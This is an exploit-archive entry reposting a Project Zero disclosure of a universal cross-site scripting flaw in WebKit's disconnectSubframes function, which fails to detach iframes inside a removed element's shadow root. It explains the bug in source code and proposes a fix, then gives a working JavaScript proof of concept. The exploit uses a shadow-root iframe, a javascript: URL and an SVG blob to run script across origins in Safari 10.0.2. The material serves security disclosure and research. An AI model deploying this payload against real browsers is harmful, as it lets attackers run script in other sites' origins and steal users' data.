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Apple WebKit 10.0.2(12602.3.12.0.1) - disconnectSubframes Universal Cross-Site Scripting Exploit
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<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1074 When an element is removed from a document, the function |disconnectSubframes| is called to detach its subframes(iframe tag, object tag, etc.). Here is a snippet of |disconnectSubframes|. void disconnectSubframes(ContainerNode& root, SubframeDisconnectPolicy policy) { ... Vector<Ref<HTMLFrameOwnerElement>> frameOwners; if (policy == RootAndDescendants) { if (is<HTMLFrameOwnerElement>(root)) frameOwners.append(downcast<HTMLFrameOwnerElement>(root)); } collectFrameOwners(frameOwners, root); // Must disable frame loading in the subtree so an unload handler cannot // insert more frames and create loaded frames in detached subtrees. SubframeLoadingDisabler disabler(root); bool isFirst = true; for (auto& owner : frameOwners) { // Don't need to traverse up the tree for the first owner since no // script could have moved it. if (isFirst || root.containsIncludingShadowDOM(&owner.get())) owner.get().disconnectContentFrame(); isFirst = false; } } The bug is that it doesn't consider |root|'s shadowroot. So any subframes in the shadowroot will be never detached. It should be like: ... collectFrameOwners(frameOwners, root); if (is<Element>(root)) { Element& element = downcast<Element>(root); if (ShadowRoot* shadowRoot = element.shadowRoot()) collectFrameOwners(frameOwners, *shadowRoot); } ... PoC: --> var d = document.body.appendChild(document.createElement("div")); var s = d.attachShadow({mode: "open"}); var f = s.appendChild(document.createElement("iframe")); f.onload = () => { f.onload = null; f.src = "javascript:alert(location)"; var xml = ` <svg xmlns="http://www.w3.org/2000/svg"> <script> document.documentElement.appendChild(parent.d); </sc` + `ript> <element a="1" a="2" /> </svg>`; var v = document.body.appendChild(document.createElement("iframe")); v.src = URL.createObjectURL(new Blob([xml], {type: "text/xml"})); }; f.src = "https://abc.xyz/"; <!-- Tested on Safari 10.0.2(12602.3.12.0.1) I didn’t notice that the method shadowRoot is declared in Node.h. So the following would better make sense. collectFrameOwners(frameOwners, root); if (ShadowRoot* shadowRoot = root.shadowRoot()) collectFrameOwners(frameOwners, *shadowRoot); --> # 0day.today [2024-09-28] #